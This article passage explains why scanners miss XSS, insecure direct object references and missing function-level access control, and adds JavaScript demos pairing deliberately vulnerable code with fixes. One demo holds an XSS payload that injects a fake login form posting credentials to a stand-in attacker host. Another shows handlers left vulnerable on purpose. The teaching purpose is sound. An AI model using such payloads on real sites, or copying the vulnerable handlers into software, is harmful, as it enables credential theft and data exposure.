The OWASP Top 10 lists several other vulnerability classes that are difficult to detect with automated scanners. Cross-Site Scripting (XSS) is one of them. An XSS flaw lets an attacker inject script or markup that a victim's browser executes in the context of the vulnerable site; attackers use it to steal session tokens and hijack user sessions, or to redirect users to a malicious site where they may be tricked into entering their credentials or payment details. OWASP highlights that automated scanners find XSS particularly hard to detect on websites built with technologies such as Ajax, where much of the page is assembled in the browser rather than on the server.
One of a CISO's nightmares is damage to the corporate reputation. Imagine a web page with the corporate logo at the top, the usual legal disclaimers at the bottom, and a dialog box asking visitors to enter their login IDs and passwords, all under the company's valid Internet address in the address bar. The catch is that the login form does not pass those credentials to the corporate web application but to a site controlled by the attacker: the form was injected into the legitimate page through an XSS flaw. Very few visitors would inspect the page source to spot the risk before entering their credentials.
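As an added example (not code from the original article), the following JavaScript shows the defect behind that scenario: a search page that echoes the user's query straight into its HTML, so a link to the legitimate site can carry a fake login form that posts to an attacker-controlled host, beside the hardened version that HTML-encodes the value before output. The site, the `q` parameter, the `attacker.example` host and the payload are all constructed for illustration.

```javascript
// Added example, not code from the article: a reflected XSS sink and its fix.
// The site, the parameter name and the attacker.example host are constructed.

// Vulnerable: the query string is concatenated straight into the HTML, so any
// markup in it becomes part of the page, under the site's own address.
function renderSearchVulnerable(query) {
  return [
    '<html><body>',
    '<img src="/logo.png" alt="Corporate logo">',
    `<h1>Search results for: ${query}</h1>`,
    '<p>No results.</p>',
    '<footer>Legal disclaimers</footer>',
    '</body></html>',
  ].join('\n');
}

// Hardened: untrusted values are HTML-entity encoded before being placed in an
// HTML text or attribute context. The browser then shows the payload as text
// and never parses it as markup. (Other contexts, such as inside <script> or a
// URL, need their own encoders; this one is only correct for HTML contexts.)
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

function renderSearchHardened(query) {
  return [
    '<html><body>',
    '<img src="/logo.png" alt="Corporate logo">',
    `<h1>Search results for: ${escapeHtml(query)}</h1>`,
    '<p>No results.</p>',
    '<footer>Legal disclaimers</footer>',
    '</body></html>',
  ].join('\n');
}

// Constructed payload: the attacker sends victims a link to the *legitimate*
// site with this in the q parameter. The injected form imitates the site's
// login dialog but posts the credentials to the attacker's host.
const PAYLOAD =
  '<form action="https://attacker.example/collect" method="post">' +
  'Your session expired. Login ID: <input name="user"> ' +
  'Password: <input name="pass" type="password"> ' +
  '<button>Sign in</button></form>';

// Does the rendered HTML contain a live <form> posting to attacker.example?
function containsOffsiteForm(html) {
  return /<form\b[^>]*\baction="https?:\/\/attacker\.example/i.test(html);
}

function demo() {
  const vulnerable = renderSearchVulnerable(PAYLOAD);
  const hardened = renderSearchHardened(PAYLOAD);
  return {
    vulnerableHasForm: containsOffsiteForm(vulnerable), // true: phishing form is live
    hardenedHasForm: containsOffsiteForm(hardened),     // false: rendered as inert text
    hardenedKeepsText: hardened.includes('&lt;form action=&quot;https:&#x2F;&#x2F;attacker.example'),
  };
}

console.log(demo());
```

Run it with `node`. Encoding on output is the primary fix; a templating engine that auto-escapes by default, plus a Content Security Policy that forbids inline script and off-site form targets, adds defence in depth. Note that an `HttpOnly` session cookie does nothing against this variant: no cookie is stolen, the victim types the credentials into the attacker's form themselves.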
Many such incidents have been publicly reported. For example, 860,000 accounts on the MacRumors forum, a site for Apple enthusiasts, were compromised as a result of an XSS exploit. With limited in-house manpower it is difficult for me to dedicate resources to continuous assessment of this risk across all corporate web-based systems. To compensate for that restriction, I ensure that most of our web-based systems are included in continuous security assessment using hybrid scanners.
Insecure Direct Object References arise when an application exposes a reference to an internal object, such as a database key or file name, in a URL or form parameter and does not verify that the requesting user is authorized for that particular object. A user who is legitimately authorized to see some data can then modify the parameter and retrieve restricted data belonging to someone else. Automated scanners cannot differentiate safe from unsafe here: the response to the tampered request is a normal, valid page, and only knowledge of who should own which record tells the two apart.
A human penetration tester may identify such a vulnerability before it leads to a data confidentiality breach. This kind of flaw sometimes slips through security tests even at large companies and results in a privacy breach affecting 100,000 customers [ix]. Missing Function Level Access Control is a similar type of vulnerability, also rooted in application logic and therefore unlikely to be identified by automated scanners. Instead of providing unauthorized access to data directly, it allows a user to invoke an application function that is not authorized for the current user's role, typically because the function is merely hidden from the user interface rather than protected on the server.
An example for the small online shopping website could be a customer gaining access to the reimbursement approval function. Changing application logic to mitigate such a vulnerability should follow secure software development life-cycle best practice, which recommends performing a security assessment after every major change. It is not uncommon for the fix for one vulnerability to create another one; critical Java vulnerabilities discovered last year were repaired by an out-of-band patch that itself introduced new vulnerabilities. If CISOs had the budget for another penetration test after a remedy is implemented and before the web system goes back into production, they would sleep much better at night. With hybrid vulnerability assessment, first introduced to the market by the Swiss company High-Tech Bridge with its ImmuniWeb SaaS, this finally seems feasible.
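The two access-control defects discussed above, Insecure Direct Object References and Missing Function Level Access Control, are shown below in JavaScript as an added example that is not part of the original article. It models the small online shop with a constructed in-memory store: an order lookup that trusts the `id` parameter beside one that ties the lookup to the session owner, and a reimbursement approval function with no role check beside one that enforces a role server-side. The users, roles, ids and function names are all assumptions for illustration.

```javascript
// Added example, not code from the article. Constructed in-memory model of the
// small online shop: orders, reimbursement requests and authenticated sessions.
// All users, roles and ids are invented for illustration.

const ORDERS = new Map([
  [1001, { owner: 'alice', total: 59.9, card: 'ending 4242' }],
  [1002, { owner: 'bob', total: 120.0, card: 'ending 1881' }],
]);

let REIMBURSEMENTS;
function resetState() {
  REIMBURSEMENTS = new Map([
    [501, { owner: 'alice', amount: 59.9, status: 'pending' }],
  ]);
}
resetState();

// What the application would recover from each caller's session cookie.
const SESSIONS = {
  alice: { user: 'alice', role: 'customer' },
  bob: { user: 'bob', role: 'customer' },
  carol: { user: 'carol', role: 'finance' },
};

// ---- Insecure Direct Object Reference ----------------------------------
// Vulnerable: GET /orders?id=1001 returns whatever order the parameter names.
// Bob is authenticated for *his* orders, edits the id, and reads Alice's.
function getOrderVulnerable(session, orderId) {
  const order = ORDERS.get(Number(orderId));
  return order ? { status: 200, order } : { status: 404 };
}

// Fixed: the lookup is bound to the caller, so a foreign id cannot resolve.
// Unknown and foreign ids both give 404; the caller learns nothing about
// which ids exist, which also defeats simple enumeration.
function getOrderFixed(session, orderId) {
  const order = ORDERS.get(Number(orderId));
  if (!order || order.owner !== session.user) return { status: 404 };
  return { status: 200, order };
}

// ---- Missing Function Level Access Control -----------------------------
// Vulnerable: the approval handler is "protected" only by not showing a
// button to customers. Anyone who knows the URL can approve a reimbursement.
function approveReimbursementVulnerable(session, id) {
  const r = REIMBURSEMENTS.get(Number(id));
  if (!r) return { status: 404 };
  r.status = 'approved';
  return { status: 200, reimbursement: r };
}

// Fixed: the role is enforced on the server, inside the handler, on every
// call. Deny by default: only listed roles proceed.
const APPROVER_ROLES = new Set(['finance']);
function approveReimbursementFixed(session, id) {
  if (!APPROVER_ROLES.has(session.role)) return { status: 403 };
  const r = REIMBURSEMENTS.get(Number(id));
  if (!r) return { status: 404 };
  r.status = 'approved';
  return { status: 200, reimbursement: r };
}

// Bob, a customer, first tampers with an order id, then calls the approval
// function directly. Properties are evaluated in source order.
function demo() {
  resetState();
  const bob = SESSIONS.bob;
  return {
    idorLeak: getOrderVulnerable(bob, '1001').status,            // 200: Alice's order leaks
    idorFixed: getOrderFixed(bob, '1001').status,                // 404
    ownOrderStillWorks: getOrderFixed(bob, '1002').status,       // 200
    approvalDenied: approveReimbursementFixed(bob, '501').status,                // 403
    statusAfterDenied: REIMBURSEMENTS.get(501).status,                           // 'pending'
    approvalByFinance: approveReimbursementFixed(SESSIONS.carol, '501').status,  // 200
    approvalVulnerable: approveReimbursementVulnerable(bob, '501').status,       // 200: any user
  };
}

console.log(demo());
```

Run it with `node`. The example also shows why a scanner struggles here: against the vulnerable code, Bob's request for his own order and his request for Alice's order both come back as well-formed 200 responses, and nothing in the HTTP exchange says which one should have been refused. A tester who knows that order 1001 belongs to Alice, or that Bob is not in finance, can tell; a tool that only inspects responses cannot.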